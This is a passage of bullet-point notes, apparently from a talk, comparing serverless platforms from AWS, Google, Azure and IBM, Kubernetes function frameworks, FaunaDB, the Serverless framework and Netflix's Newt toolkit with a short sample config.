- X-Ray - Shows us the visual function calls in a graph
- Local Development
- No Tool from AWS
- There is a project on github to do this
- Ecosystem
- Step functions
- Creating workflows - Can be described visually in the UI
- Coordinate functions
- Step functions
Google Cloud Functions
- Runtimes
- Node.js
- Events
- HTTP request
- Cloud Pub/Sub
- ...
- Monitoring + Logging
- Logs and Metrics pushed to Stackdriver Logging
- ...
- Debugging + Diagnostics
- Debugging with Stackdriver Debugger
- Local Development
- Cloud Functions Local Emulator
- Ecosystem
- Cloud Functions for Firebase
Microsoft Azure
- Runtimes
- Node
- C#
- ...
- Events
- Http Requests
- Schedule
- Azure stuff
- Monitoring + Logging
- Logs and metrics are pushed to Application Insight
- ...
- Debugging + Diagnostics
- Debugging via local Visual Studio
- Ecosystem
- Logic Apps
IBM - Open Source project
- Runtimes
- Node.js
- Swift
- ...
- anything via Docker
- Events
- HTTP Requests
- Github events
- ...
Functions on Kubernetes
- Kubeless
- Fission
- Funktion
FaunaDB
- DB
- From the team that scales Twitter
- global consistency
- Pay for actual usage
Serverless (company)
- Offers a CLI
- A Framework
- Serverless.yaml file
serverless deploy
- Different Providers
@mthenw
polyglot - multiple languages
Nebula OSPackage - Turns Java app into an debian package
Newt - Netflix Workflow Toolkit
- CLI in Golang
newt package
- `newt setup``
- .newt.yml
app-type: node-beta
build-step: newt exec npm run-script build
tool-versions:
node: 6.9.1
npm: 3.10.8
alias npm="newt exec npm --"